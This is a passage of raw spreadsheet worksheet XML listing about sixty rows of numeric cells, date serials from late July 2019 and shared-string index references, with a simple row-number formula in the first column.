      <c r="D12435" s="1">
        <v>43673</v>
      </c>
      <c r="E12435" t="s">
        <v>19917</v>
      </c>
      <c r="F12435" t="s">
        <v>9975</v>
      </c>
      <c r="G12435" t="s">
        <v>22626</v>
      </c>
    </row>
    <row r="12436" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12436">
        <f t="shared" si="194"/>
        <v>12435</v>
      </c>
      <c r="B12436">
        <v>2435</v>
      </c>
      <c r="C12436" t="s">
        <v>19637</v>
      </c>
      <c r="D12436" s="1">
        <v>43671</v>
      </c>
      <c r="E12436" t="s">
        <v>22627</v>
      </c>
      <c r="F12436" t="s">
        <v>10526</v>
      </c>
      <c r="G12436" t="s">
        <v>22628</v>
      </c>
    </row>
    <row r="12437" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12437">
        <f t="shared" si="194"/>
        <v>12436</v>
      </c>
      <c r="B12437">
        <v>2436</v>
      </c>
      <c r="C12437" t="s">
        <v>19637</v>
      </c>
      <c r="D12437" s="1">
        <v>43675</v>
      </c>
      <c r="E12437" t="s">
        <v>19643</v>
      </c>
      <c r="F12437" t="s">
        <v>10021</v>
      </c>
      <c r="G12437" t="s">
        <v>22629</v>
      </c>
    </row>
    <row r="12438" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12438">
        <f t="shared" si="194"/>
        <v>12437</v>
      </c>
      <c r="B12438">
        <v>2437</v>
      </c>
      <c r="C12438" t="s">
        <v>19637</v>
      </c>
      <c r="D12438" s="1">
        <v>43670</v>
      </c>
      <c r="E12438" t="s">
        <v>19680</v>
      </c>
      <c r="F12438" t="s">
        <v>10021</v>
      </c>
      <c r="G12438" t="s">
        <v>22630</v>
      </c>
    </row>
    <row r="12439" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12439">
        <f t="shared" si="194"/>
        <v>12438</v>
      </c>
      <c r="B12439">
        <v>2438</v>
      </c>
      <c r="C12439" t="s">
        <v>19637</v>
      </c>
      <c r="D12439" s="1">
        <v>43671</v>
      </c>
      <c r="E12439" t="s">
        <v>19695</v>
      </c>
      <c r="F12439" t="s">
        <v>9975</v>
      </c>
      <c r="G12439" t="s">
        <v>22631</v>
      </c>
    </row>
    <row r="12440" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12440">
        <f t="shared" si="194"/>
        <v>12439</v>
      </c>
      <c r="B12440">
        <v>2439</v>
      </c>
      <c r="C12440" t="s">
        <v>19637</v>
      </c>
      <c r="D12440" s="1">
        <v>43674</v>
      </c>
      <c r="E12440" t="s">
        <v>20005</v>
      </c>
      <c r="F12440" t="s">
        <v>9975</v>
      </c>
      <c r="G12440" t="s">
        <v>22632</v>
      </c>
    </row>
    <row r="12441" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12441">
        <f t="shared" si="194"/>
        <v>12440</v>
      </c>
      <c r="B12441">
        <v>2440</v>
      </c>
      <c r="C12441" t="s">
        <v>19637</v>
      </c>
      <c r="D12441" s="1">
        <v>43668</v>
      </c>
      <c r="F12441" t="s">
        <v>10021</v>
      </c>
      <c r="G12441" t="s">
        <v>19708</v>
      </c>
    </row>
    <row r="12442" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12442">
        <f t="shared" si="194"/>
        <v>12441</v>
      </c>
      <c r="B12442">
        <v>2441</v>
      </c>
      <c r="C12442" t="s">
        <v>19637</v>
      </c>
      <c r="D12442" s="1">
        <v>43675</v>
      </c>
      <c r="E12442" t="s">
        <v>22370</v>
      </c>
      <c r="F12442" t="s">
        <v>10526</v>
      </c>
      <c r="G12442" t="s">
        <v>22633</v>
      </c>
    </row>
    <row r="12443" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12443">
        <f t="shared" si="194"/>
        <v>12442</v>
      </c>
      <c r="B12443">
        <v>2442</v>
      </c>
      <c r="C12443" t="s">
        <v>19637</v>
      </c>
      <c r="D12443" s="1">
        <v>43669</v>
      </c>
      <c r="E12443" t="s">
        <v>19741</v>
      </c>
      <c r="F12443" t="s">
        <v>9975</v>
      </c>
      <c r="G12443" t="s">
        <v>22634</v>
      </c>
    </row>
    <row r="12444" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12444">
        <f t="shared" si="194"/>
        <v>12443</v>
      </c>
      <c r="B12444">
        <v>2443</v>
      </c>
      <c r="C12444" t="s">
        <v>19637</v>
      </c>
      <c r="D12444" s="1">
        <v>43676</v>
      </c>
      <c r="F12444" t="s">
        <v>10021</v>
      </c>
      <c r="G12444" t="s">
        <v>19708</v>
      </c>
    </row>
    <row r="12445" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12445">
        <f t="shared" si="194"/>
        <v>12444</v>
      </c>
      <c r="B12445">
        <v>2444</v>
      </c>
      <c r="C12445" t="s">
        <v>19637</v>
      </c>
      <c r="D12445" s="1">
        <v>43677</v>
      </c>
      <c r="E12445" t="s">
        <v>22635</v>
      </c>
      <c r="F12445" t="s">
        <v>10526</v>
      </c>
      <c r="G12445" t="s">
        <v>22636</v>
      </c>
    </row>
    <row r="12446" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12446">
        <f t="shared" si="194"/>
        <v>12445</v>
      </c>
      <c r="B12446">
        <v>2445</v>
      </c>
      <c r="C12446" t="s">
        <v>19637</v>
      </c>
      <c r="D12446" s="1">
        <v>43671</v>
      </c>
      <c r="E12446" t="s">
        <v>19750</v>
      </c>
      <c r="F12446" t="s">
        <v>9978</v>
      </c>
      <c r="G12446" t="s">
        <v>22637</v>
      </c>
    </row>
    <row r="12447" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12447">
        <f t="shared" si="194"/>
        <v>12446</v>
      </c>
      <c r="B12447">
        <v>2446</v>
      </c>
      <c r="C12447" t="s">
        <v>19637</v>
      </c>
      <c r="D12447" s="1">
        <v>43670</v>
      </c>
      <c r="E12447" t="s">
        <v>19643</v>
      </c>
      <c r="F12447" t="s">
        <v>10021</v>
      </c>
      <c r="G12447" t="s">
        <v>22638</v>
      </c>
    </row>
    <row r="12448" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12448">
        <f t="shared" si="194"/>
        <v>12447</v>
      </c>
      <c r="B12448">
        <v>2447</v>
      </c>
      <c r="C12448" t="s">
        <v>19637</v>
      </c>
      <c r="D12448" s="1">
        <v>43671</v>
      </c>
      <c r="E12448" t="s">
        <v>22639</v>
      </c>
      <c r="F12448" t="s">
        <v>10021</v>
      </c>
      <c r="G12448" t="s">
        <v>22640</v>
      </c>
    </row>
    <row r="12449" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12449">
        <f t="shared" si="194"/>
        <v>12448</v>
      </c>
      <c r="B12449">
        <v>2448</v>
      </c>
      <c r="C12449" t="s">
        <v>19637</v>
      </c>
      <c r="D12449" s="1">
        <v>43670</v>
      </c>
      <c r="E12449" t="s">
        <v>19750</v>
      </c>
      <c r="F12449" t="s">
        <v>9978</v>
      </c>
      <c r="G12449" t="s">
        <v>22641</v>
      </c>
    </row>
    <row r="12450" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12450">
        <f t="shared" si="194"/>
        <v>12449</v>
      </c>
      <c r="B12450">
        <v>2449</v>
      </c>
      <c r="C12450" t="s">
        <v>19637</v>
      </c>
      <c r="D12450" s="1">
        <v>43671</v>
      </c>
      <c r="E12450" t="s">
        <v>19640</v>
      </c>
      <c r="F12450" t="s">
        <v>9975</v>
      </c>
      <c r="G12450" t="s">
        <v>22642</v>
      </c>
    </row>
    <row r="12451" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12451">
        <f t="shared" si="194"/>
        <v>12450</v>
      </c>
      <c r="B12451">
        <v>2450</v>
      </c>
      <c r="C12451" t="s">
        <v>19637</v>
      </c>
      <c r="D12451" s="1">
        <v>43668</v>
      </c>
      <c r="E12451" t="s">
        <v>19750</v>
      </c>
      <c r="F12451" t="s">
        <v>9978</v>
      </c>
      <c r="G12451" t="s">
        <v>22643</v>
      </c>
    </row>
    <row r="12452" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12452">
        <f t="shared" si="194"/>
        <v>12451</v>
      </c>
      <c r="B12452">
        <v>2451</v>
      </c>
      <c r="C12452" t="s">
        <v>19637</v>
      </c>
      <c r="D12452" s="1">
        <v>43671</v>
      </c>
      <c r="F12452" t="s">
        <v>10526</v>
      </c>
      <c r="G12452" t="s">
        <v>22644</v>
      </c>
    </row>
    <row r="12453" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12453">
        <f t="shared" si="194"/>
        <v>12452</v>
      </c>
      <c r="B12453">
        <v>2452</v>
      </c>
      <c r="C12453" t="s">
        <v>19637</v>
      </c>
      <c r="D12453" s="1">
        <v>43672</v>
      </c>
      <c r="E12453" t="s">
        <v>22645</v>
      </c>
      <c r="F12453" t="s">
        <v>10526</v>
      </c>
      <c r="G12453" t="s">
        <v>22646</v>
      </c>
    </row>
    <row r="12454" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12454">
        <f t="shared" si="194"/>
        <v>12453</v>
      </c>
      <c r="B12454">
        <v>2453</v>
      </c>
      <c r="C12454" t="s">
        <v>19637</v>
      </c>
      <c r="D12454" s="1">
        <v>43669</v>
      </c>
      <c r="E12454" t="s">
        <v>22197</v>
      </c>
      <c r="F12454" t="s">
        <v>10526</v>
      </c>
      <c r="G12454" t="s">
        <v>22198</v>
      </c>
    </row>
    <row r="12455" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12455">
        <f t="shared" si="194"/>
        <v>12454</v>
      </c>
      <c r="B12455">
        <v>2454</v>
      </c>
      <c r="C12455" t="s">
        <v>19637</v>
      </c>
      <c r="D12455" s="1">
        <v>43672</v>
      </c>
      <c r="E12455" t="s">
        <v>22647</v>
      </c>
      <c r="F12455" t="s">
        <v>10526</v>
      </c>
      <c r="G12455" t="s">
        <v>22648</v>
      </c>
    </row>
    <row r="12456" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12456">
        <f t="shared" si="194"/>
        <v>12455</v>
      </c>
      <c r="B12456">
        <v>2455</v>
      </c>
      <c r="C12456" t="s">
        <v>19637</v>
      </c>
      <c r="D12456" s="1">
        <v>43677</v>
      </c>
      <c r="E12456" t="s">
        <v>19640</v>
      </c>
      <c r="F12456" t="s">
        <v>9975</v>
      </c>
      <c r="G12456" t="s">
        <v>22649</v>
      </c>
    </row>
    <row r="12457" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12457">
        <f t="shared" si="194"/>
        <v>12456</v>
      </c>
      <c r="B12457">
        <v>2456</v>
      </c>
      <c r="C12457" t="s">
        <v>19637</v>
      </c>
      <c r="D12457" s="1">
        <v>43674</v>
      </c>
      <c r="F12457" t="s">
        <v>10526</v>
      </c>
      <c r="G12457" t="s">
        <v>22650</v>
      </c>
    </row>
    <row r="12458" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12458">
        <f t="shared" si="194"/>
        <v>12457</v>
      </c>
      <c r="B12458">
        <v>2457</v>
      </c>
      <c r="C12458" t="s">
        <v>19637</v>
      </c>
      <c r="D12458" s="1">
        <v>43676</v>
      </c>
      <c r="E12458" t="s">
        <v>19717</v>
      </c>
      <c r="F12458" t="s">
        <v>10526</v>
      </c>
      <c r="G12458" t="s">
        <v>22651</v>
      </c>
    </row>
    <row r="12459" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12459">
        <f t="shared" si="194"/>
        <v>12458</v>
      </c>
      <c r="B12459">
        <v>2458</v>
      </c>
      <c r="C12459" t="s">
        <v>19637</v>
      </c>
      <c r="D12459" s="1">
        <v>43675</v>
      </c>
      <c r="E12459" t="s">
        <v>22652</v>
      </c>
      <c r="F12459" t="s">
        <v>10021</v>
      </c>
      <c r="G12459" t="s">
        <v>22653</v>
      </c>
    </row>
    <row r="12460" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12460">
        <f t="shared" si="194"/>
        <v>12459</v>
      </c>
      <c r="B12460">
        <v>2459</v>
      </c>
      <c r="C12460" t="s">
        <v>19637</v>
      </c>
      <c r="D12460" s="1">
        <v>43677</v>
      </c>
      <c r="E12460" t="s">
        <v>20005</v>
      </c>
      <c r="F12460" t="s">
        <v>9975</v>
      </c>
      <c r="G12460" t="s">
        <v>22654</v>
      </c>
    </row>
    <row r="12461" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12461">
        <f t="shared" si="194"/>
        <v>12460</v>
      </c>
      <c r="B12461">
        <v>2460</v>
      </c>
      <c r="C12461" t="s">
        <v>19637</v>
      </c>
      <c r="D12461" s="1">
        <v>43675</v>
      </c>
      <c r="E12461" t="s">
        <v>22655</v>
      </c>
      <c r="F12461" t="s">
        <v>10526</v>
      </c>
      <c r="G12461" t="s">
        <v>22656</v>
      </c>
    </row>
    <row r="12462" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12462">
        <f t="shared" si="194"/>
        <v>12461</v>
      </c>
      <c r="B12462">
        <v>2461</v>
      </c>
      <c r="C12462" t="s">
        <v>19637</v>
      </c>
      <c r="D12462" s="1">
        <v>43670</v>
      </c>
      <c r="E12462" t="s">
        <v>19640</v>
      </c>
      <c r="F12462" t="s">
        <v>10021</v>
      </c>
      <c r="G12462" t="s">
        <v>22657</v>
      </c>
    </row>
    <row r="12463" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12463">
        <f t="shared" si="194"/>
        <v>12462</v>
      </c>
      <c r="B12463">
        <v>2462</v>
      </c>
      <c r="C12463" t="s">
        <v>19637</v>
      </c>
      <c r="D12463" s="1">
        <v>43672</v>
      </c>
      <c r="E12463" t="s">
        <v>22658</v>
      </c>
      <c r="F12463" t="s">
        <v>10021</v>
      </c>
      <c r="G12463" t="s">
        <v>22659</v>
      </c>
    </row>
    <row r="12464" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12464">
        <f t="shared" si="194"/>
        <v>12463</v>
      </c>
      <c r="B12464">
        <v>2463</v>
      </c>
      <c r="C12464" t="s">
        <v>19637</v>
      </c>
      <c r="D12464" s="1">
        <v>43669</v>
      </c>
      <c r="E12464" t="s">
        <v>22660</v>
      </c>
      <c r="F12464" t="s">
        <v>10526</v>
      </c>
      <c r="G12464" t="s">
        <v>22661</v>
      </c>
    </row>
    <row r="12465" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12465">
        <f t="shared" si="194"/>
        <v>12464</v>
      </c>
      <c r="B12465">
        <v>2464</v>
      </c>
      <c r="C12465" t="s">
        <v>19637</v>
      </c>
      <c r="D12465" s="1">
        <v>43669</v>
      </c>
      <c r="E12465" t="s">
        <v>19840</v>
      </c>
      <c r="F12465" t="s">
        <v>10021</v>
      </c>
      <c r="G12465" t="s">
        <v>22662</v>
      </c>
    </row>
    <row r="12466" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12466">
        <f t="shared" si="194"/>
        <v>12465</v>
      </c>
      <c r="B12466">
        <v>2465</v>
      </c>
      <c r="C12466" t="s">
        <v>19637</v>
      </c>
      <c r="D12466" s="1">
        <v>43670</v>
      </c>
      <c r="E12466" t="s">
        <v>19655</v>
      </c>
      <c r="F12466" t="s">
        <v>9975</v>
      </c>
      <c r="G12466" t="s">
        <v>22663</v>
      </c>
    </row>
    <row r="12467" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12467">
        <f t="shared" si="194"/>
        <v>12466</v>
      </c>
      <c r="B12467">
        <v>2466</v>
      </c>
      <c r="C12467" t="s">
        <v>19637</v>
      </c>
      <c r="D12467" s="1">
        <v>43669</v>
      </c>
      <c r="E12467" t="s">
        <v>19776</v>
      </c>
      <c r="F12467" t="s">
        <v>10021</v>
      </c>
      <c r="G12467" t="s">
        <v>22664</v>
      </c>
    </row>
    <row r="12468" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12468">
        <f t="shared" si="194"/>
        <v>12467</v>
      </c>
      <c r="B12468">
        <v>2467</v>
      </c>
      <c r="C12468" t="s">
        <v>19637</v>
      </c>
      <c r="D12468" s="1">
        <v>43675</v>
      </c>
      <c r="E12468" t="s">
        <v>19640</v>
      </c>
      <c r="F12468" t="s">
        <v>9978</v>
      </c>
      <c r="G12468" t="s">
        <v>22665</v>
      </c>
    </row>
    <row r="12469" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12469">
        <f t="shared" si="194"/>
        <v>12468</v>
      </c>
      <c r="B12469">
        <v>2468</v>
      </c>
      <c r="C12469" t="s">
        <v>19637</v>
      </c>
      <c r="D12469" s="1">
        <v>43669</v>
      </c>
      <c r="E12469" t="s">
        <v>21678</v>
      </c>
      <c r="F12469" t="s">
        <v>9975</v>
      </c>
      <c r="G12469" t="s">
        <v>22666</v>
      </c>
    </row>
    <row r="12470" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12470">
        <f t="shared" si="194"/>
        <v>12469</v>
      </c>
      <c r="B12470">
        <v>2469</v>
      </c>
      <c r="C12470" t="s">
        <v>19637</v>
      </c>
      <c r="D12470" s="1">
        <v>43668</v>
      </c>
      <c r="E12470" t="s">
        <v>22667</v>
      </c>
      <c r="F12470" t="s">
        <v>10021</v>
      </c>
      <c r="G12470" t="s">
        <v>22668</v>
      </c>
    </row>
    <row r="12471" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12471">
        <f t="shared" si="194"/>
        <v>12470</v>
      </c>
      <c r="B12471">
        <v>2470</v>
      </c>
      <c r="C12471" t="s">
        <v>19637</v>
      </c>
      <c r="D12471" s="1">
        <v>43674</v>
      </c>
      <c r="E12471" t="s">
        <v>19902</v>
      </c>
      <c r="F12471" t="s">
        <v>9975</v>
      </c>
      <c r="G12471" t="s">
        <v>22669</v>
      </c>
    </row>
    <row r="12472" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12472">
        <f t="shared" si="194"/>
        <v>12471</v>
      </c>
      <c r="B12472">
        <v>2471</v>
      </c>
      <c r="C12472" t="s">
        <v>19637</v>
      </c>
      <c r="D12472" s="1">
        <v>43675</v>
      </c>
      <c r="F12472" t="s">
        <v>10526</v>
      </c>
      <c r="G12472" t="s">
        <v>22231</v>
      </c>
    </row>
    <row r="12473" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12473">
        <f t="shared" si="194"/>
        <v>12472</v>
      </c>
      <c r="B12473">
        <v>2472</v>
      </c>
      <c r="C12473" t="s">
        <v>19637</v>
      </c>
      <c r="D12473" s="1">
        <v>43674</v>
      </c>
      <c r="E12473" t="s">
        <v>22670</v>
      </c>
      <c r="F12473" t="s">
        <v>10021</v>
      </c>
      <c r="G12473" t="s">
        <v>22671</v>
      </c>
    </row>
    <row r="12474" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12474">
        <f t="shared" si="194"/>
        <v>12473</v>
      </c>
      <c r="B12474">
        <v>2473</v>
      </c>
      <c r="C12474" t="s">
        <v>19637</v>
      </c>
      <c r="D12474" s="1">
        <v>43676</v>
      </c>
      <c r="E12474" t="s">
        <v>19643</v>
      </c>
      <c r="F12474" t="s">
        <v>10021</v>
      </c>
      <c r="G12474" t="s">
        <v>22672</v>
      </c>
    </row>
    <row r="12475" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12475">
        <f t="shared" si="194"/>
        <v>12474</v>
      </c>
      <c r="B12475">
        <v>2474</v>
      </c>
      <c r="C12475" t="s">
        <v>19637</v>
      </c>
      <c r="D12475" s="1">
        <v>43674</v>
      </c>
      <c r="E12475" t="s">
        <v>19653</v>
      </c>
      <c r="F12475" t="s">
        <v>9975</v>
      </c>
      <c r="G12475" t="s">
        <v>22673</v>
      </c>
    </row>
    <row r="12476" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12476">
        <f t="shared" si="194"/>
        <v>12475</v>
      </c>
      <c r="B12476">
        <v>2475</v>
      </c>
      <c r="C12476" t="s">
        <v>19637</v>
      </c>
      <c r="D12476" s="1">
        <v>43672</v>
      </c>
      <c r="E12476" t="s">
        <v>19648</v>
      </c>
      <c r="F12476" t="s">
        <v>10021</v>
      </c>
      <c r="G12476" t="s">
        <v>22674</v>
      </c>
    </row>
    <row r="12477" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12477">
        <f t="shared" si="194"/>
        <v>12476</v>
      </c>
      <c r="B12477">
        <v>2476</v>
      </c>
      <c r="C12477" t="s">
        <v>19637</v>
      </c>
      <c r="D12477" s="1">
        <v>43673</v>
      </c>
      <c r="E12477" t="s">
        <v>20187</v>
      </c>
      <c r="F12477" t="s">
        <v>9975</v>
      </c>
      <c r="G12477" t="s">
        <v>22675</v>
      </c>
    </row>
    <row r="12478" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12478">
        <f t="shared" si="194"/>
        <v>12477</v>
      </c>
      <c r="B12478">
        <v>2477</v>
      </c>
      <c r="C12478" t="s">
        <v>19637</v>
      </c>
      <c r="D12478" s="1">
        <v>43673</v>
      </c>
      <c r="E12478" t="s">
        <v>19640</v>
      </c>
      <c r="F12478" t="s">
        <v>10021</v>
      </c>
      <c r="G12478" t="s">
        <v>22676</v>
      </c>
    </row>
    <row r="12479" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12479">
        <f t="shared" si="194"/>
        <v>12478</v>
      </c>
      <c r="B12479">
        <v>2478</v>
      </c>
      <c r="C12479" t="s">
        <v>19637</v>
      </c>
      <c r="D12479" s="1">
        <v>43674</v>
      </c>
      <c r="E12479" t="s">
        <v>20005</v>
      </c>
      <c r="F12479" t="s">
        <v>9975</v>
      </c>
      <c r="G12479" t="s">
        <v>22677</v>
      </c>
    </row>
    <row r="12480" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12480">
        <f t="shared" si="194"/>
        <v>12479</v>
      </c>
      <c r="B12480">
        <v>2479</v>
      </c>
      <c r="C12480" t="s">
        <v>19637</v>
      </c>
      <c r="D12480" s="1">
        <v>43670</v>
      </c>
      <c r="E12480" t="s">
        <v>19640</v>
      </c>
      <c r="F12480" t="s">
        <v>9975</v>
      </c>
      <c r="G12480" t="s">
        <v>22678</v>
      </c>
    </row>
    <row r="12481" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12481">
        <f t="shared" si="194"/>
        <v>12480</v>
      </c>
      <c r="B12481">
        <v>2480</v>
      </c>
      <c r="C12481" t="s">
        <v>19637</v>
      </c>
      <c r="D12481" s="1">
        <v>43675</v>
      </c>
      <c r="E12481" t="s">
        <v>19750</v>
      </c>
      <c r="F12481" t="s">
        <v>9978</v>
      </c>
      <c r="G12481" t="s">
        <v>22679</v>
      </c>
    </row>
    <row r="12482" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12482">
        <f t="shared" si="194"/>
        <v>12481</v>
      </c>
      <c r="B12482">
        <v>2481</v>
      </c>
      <c r="C12482" t="s">
        <v>19637</v>
      </c>
      <c r="D12482" s="1">
        <v>43674</v>
      </c>
      <c r="F12482" t="s">
        <v>10526</v>
      </c>
      <c r="G12482" t="s">
        <v>21443</v>
      </c>
    </row>
    <row r="12483" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12483">
        <f t="shared" ref="A12483:A12546" si="195">+ROW(A12482)</f>
        <v>12482</v>
      </c>
      <c r="B12483">
        <v>2482</v>
      </c>
      <c r="C12483" t="s">
        <v>19637</v>
      </c>
      <c r="D12483" s="1">
        <v>43668</v>
      </c>
      <c r="E12483" t="s">
        <v>22680</v>
      </c>
      <c r="F12483" t="s">
        <v>10526</v>
      </c>
      <c r="G12483" t="s">
        <v>22681</v>
      </c>
    </row>
    <row r="12484" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12484">
        <f t="shared" si="195"/>
        <v>12483</v>
      </c>
      <c r="B12484">
        <v>2483</v>
      </c>
      <c r="C12484" t="s">
        <v>19637</v>
      </c>
      <c r="D12484" s="1">
        <v>43677</v>
      </c>
      <c r="E12484" t="s">
        <v>19687</v>
      </c>
      <c r="F12484" t="s">
        <v>10021</v>
      </c>
      <c r="G12484" t="s">
        <v>22682</v>
      </c>
    </row>
    <row r="12485" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12485">
        <f t="shared" si="195"/>
        <v>12484</v>
      </c>
      <c r="B12485">
        <v>2484</v>
      </c>
      <c r="C12485" t="s">
        <v>19637</v>
      </c>
      <c r="D12485" s="1">
        <v>43670</v>
      </c>
      <c r="F12485" t="s">
        <v>9978</v>
      </c>
      <c r="G12485" t="s">
        <v>22683</v>
      </c>
    </row>
    <row r="12486" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12486">
        <f t="shared" si="195"/>
        <v>12485</v>
      </c>
      <c r="B12486">
        <v>2485</v>
      </c>
      <c r="C12486" t="s">
        <v>19637</v>
      </c>
      <c r="D12486" s="1">
        <v>43676</v>
      </c>
      <c r="E12486" t="s">
        <v>22684</v>
      </c>
      <c r="F12486" t="s">
        <v>10526</v>
      </c>
      <c r="G12486" t="s">
        <v>22685</v>
      </c>
    </row>
    <row r="12487" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12487">
        <f t="shared" si="195"/>
        <v>12486</v>
      </c>
      <c r="B12487">
        <v>2486</v>
      </c>
      <c r="C12487" t="s">
        <v>19637</v>
      </c>
      <c r="D12487" s="1">
        <v>43669</v>
      </c>
      <c r="E12487" t="s">
        <v>19736</v>
      </c>
      <c r="F12487" t="s">
        <v>10526</v>
      </c>
      <c r="G12487" t="s">
        <v>22686</v>
      </c>
    </row>
    <row r="12488" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12488">
        <f t="shared" si="195"/>
        <v>12487</v>
      </c>
      <c r="B12488">
        <v>2487</v>
      </c>
      <c r="C12488" t="s">
        <v>19637</v>
      </c>
      <c r="D12488" s="1">
        <v>43669</v>
      </c>
      <c r="E12488" t="s">
        <v>22687</v>
      </c>
      <c r="F12488" t="s">
        <v>10526</v>
      </c>
      <c r="G12488" t="s">
        <v>22688</v>
      </c>
    </row>
    <row r="12489" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12489">
        <f t="shared" si="195"/>
        <v>12488</v>
      </c>
      <c r="B12489">
        <v>2488</v>
      </c>
      <c r="C12489" t="s">
        <v>19637</v>
      </c>
      <c r="D12489" s="1">
        <v>43671</v>
      </c>
      <c r="E12489" t="s">
        <v>19796</v>
      </c>
      <c r="F12489" t="s">
        <v>10021</v>
      </c>
      <c r="G12489" t="s">
        <v>22689</v>
      </c>
    </row>
    <row r="12490" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12490">
        <f t="shared" si="195"/>
        <v>12489</v>
      </c>
      <c r="B12490">
        <v>2489</v>
      </c>
      <c r="C12490" t="s">
        <v>19637</v>
      </c>
      <c r="D12490" s="1">
        <v>43668</v>
      </c>
      <c r="E12490" t="s">
        <v>19640</v>
      </c>
      <c r="F12490" t="s">
        <v>9975</v>
      </c>
      <c r="G12490" t="s">
        <v>22690</v>
      </c>
    </row>
    <row r="12491" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12491">
        <f t="shared" si="195"/>
        <v>12490</v>
      </c>
      <c r="B12491">
        <v>2490</v>
      </c>
      <c r="C12491" t="s">
        <v>19637</v>
      </c>
      <c r="D12491" s="1">
        <v>43675</v>
      </c>
      <c r="E12491" t="s">
        <v>21090</v>
      </c>
      <c r="F12491" t="s">
        <v>10021</v>
      </c>
      <c r="G12491" t="s">
        <v>22691</v>
      </c>
    </row>
    <row r="12492" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12492">
        <f t="shared" si="195"/>
        <v>12491</v>
      </c>
      <c r="B12492">
        <v>2491</v>
      </c>
      <c r="C12492" t="s">
        <v>19637</v>
      </c>
      <c r="D12492" s="1">
        <v>43668</v>
      </c>
      <c r="E12492" t="s">
        <v>22692</v>
      </c>
      <c r="F12492" t="s">
        <v>10021</v>
      </c>
      <c r="G12492" t="s">
        <v>22693</v>
      </c>
    </row>
    <row r="12493" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12493">
        <f t="shared" si="195"/>
        <v>12492</v>
      </c>
      <c r="B12493">
        <v>2492</v>
      </c>
      <c r="C12493" t="s">
        <v>19637</v>
      </c>
      <c r="D12493" s="1">
        <v>43668</v>
      </c>
      <c r="E12493" t="s">
        <v>19640</v>
      </c>
      <c r="F12493" t="s">
        <v>10526</v>
      </c>
      <c r="G12493" t="s">
        <v>22694</v>
      </c>
    </row>
    <row r="12494" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12494">
        <f t="shared" si="195"/>
        <v>12493</v>
      </c>
      <c r="B12494">
        <v>2493</v>
      </c>
      <c r="C12494" t="s">
        <v>19637</v>
      </c>
      <c r="D12494" s="1">
        <v>43671</v>
      </c>
      <c r="E12494" t="s">
        <v>22695</v>
      </c>
      <c r="F12494" t="s">
        <v>10526</v>
      </c>
      <c r="G12494" t="s">
        <v>22696</v>
      </c>
    </row>
    <row r="12495" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12495">
        <f t="shared" si="195"/>
        <v>12494</v>
      </c>
      <c r="B12495">
        <v>2494</v>
      </c>
      <c r="C12495" t="s">
        <v>19637</v>
      </c>
      <c r="D12495" s="1">
        <v>43669</v>
      </c>
      <c r="E12495" t="s">
        <v>19849</v>
      </c>
      <c r="F12495" t="s">
        <v>10021</v>
      </c>
      <c r="G12495" t="s">
        <v>22697</v>
      </c>
    </row>
    <row r="12496" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12496">
        <f t="shared" si="195"/>
        <v>12495</v>
      </c>
      <c r="B12496">
        <v>2495</v>
      </c>
      <c r="C12496" t="s">
        <v>19637</v>
      </c>
      <c r="D12496" s="1">
        <v>43672</v>
      </c>
      <c r="E12496" t="s">
        <v>21415</v>
      </c>
      <c r="F12496" t="s">
        <v>10021</v>
      </c>
      <c r="G12496" t="s">
        <v>22698</v>
      </c>
    </row>
    <row r="12497" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12497">
